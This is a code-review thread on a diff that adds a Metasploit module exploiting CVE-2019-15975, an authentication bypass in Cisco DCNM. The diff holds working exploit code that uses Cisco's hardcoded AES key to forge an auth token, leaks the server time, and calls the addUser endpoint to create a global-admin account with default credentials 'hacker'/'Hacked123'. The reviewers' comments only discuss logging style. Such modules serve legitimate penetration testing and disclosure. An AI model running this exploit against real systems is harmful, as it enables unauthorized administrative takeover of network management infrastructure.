modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb

```diff
@@ -0,0 +1,156 @@
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2019-15975']
+          ],
+        'DisclosureDate' => '2020-06-01',
+        'DefaultOptions' => { 'SSL' => true }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('NBRETRIES', [true, 'Maximum number of attempts', 50]),
+      OptString.new('TARGETURI', [true, 'The base path of the Cisco DCNM', '/']),
+      OptString.new('USERNAME', [true, 'The username of the admin account you want to add', 'hacker']),
+      OptString.new('PASSWORD', [true, 'The password of the admin account you want to add', 'Hacked123'])
+    ])
+  end
+
+  class AESCipher
+    def initialize
+      # Cisco's hardcoded key
+      @key = 's91zEQmb305F!90a'
+      @bs = 16
+    end
+
+    def _pad(size)
+      size + (@bs - size.length % @bs).chr.to_s * (@bs - size.length % @bs)
+    end
+
+    def encrypt(raw)
+      raw = _pad(raw)
+      iv = "\x00" * 0x10
+      cipher = OpenSSL::Cipher.new('aes-128-cbc')
+      cipher.encrypt
+      cipher.key = @key
+      cipher.iv = iv
+      Base64.encode64(cipher.update(raw))
+    end
+  end
+
+  def make_raw_token(target)
+    key = 'what_a_nice_key'
+    uuid = SecureRandom.uuid.gsub('-', '')[0..20]
+    time = leak_time(target)
+    raw_token = format('%<key>s-%<uuid>s-%<time>s', key: key, uuid: uuid, time: time)
+    raw_token
+  end
+
+  def bypass_auth(_target, token, usr, pwd)
+    d = {
+      'userName' => usr,
+      'password' => pwd,
+      'roleName' => 'global-admin'
+    }
+    h = { 'afw-token' => token }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'headers' => h,
+      'vars_post' => d,
+      'uri' => normalize_uri(target_uri.path + 'fm/fmrest/dbadmin/addUser')
+    })
+
+    if r.body != 'Access denied'
+
+      begin
+        json = JSON.parse(r.body)
+
+        if json['resultMessage'] == 'Success' || json['resultMessage'] == 'User already exists.'
+          return 0
+        elsif json['resultMessage'] == 'Cannot add user since password strength check failed'
+          return 1
+        end
+      rescue StandardError
+        return -2
+      end
+    end
+    -1
+  end
+
+  def leak_time(_target)
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    r_time = DateTime.strptime(r.headers['Date'][0..-4], '%a, %d %b %Y %H:%M:%S').strftime('%s')
+    r_time
+  end
+
+  def add_admin_account(usr, pwd)
+    nbre_of_tries = 0
+    res = -1
+    while nbre_of_tries < datastore['NBRETRIES']
+      nbre_of_tries += 1
+      raw = make_raw_token(datastore['RHOST'])
+      cryptor = AESCipher.new
+      token = cryptor.encrypt(raw).gsub("\n", '')
+      res = bypass_auth(datastore['RHOST'], token, usr, pwd)
+      if res != -1
+        return res
+      end
+    end
+    print_bad(format("Didn't succeed after %s attempts", datastore['NBRETRIES']))
```

Comment:
```suggestion
    print_error("Didn't succeed after #{datastore['RETRIES'] attempts")
```

Reply:
What is the difference between `print_error` and `print_bad` ?

Reply:
There isn't any, it's just an alias of `print_error` which is used more often. The focal point of this suggestion was the use of string interpolation rather than the `format` function.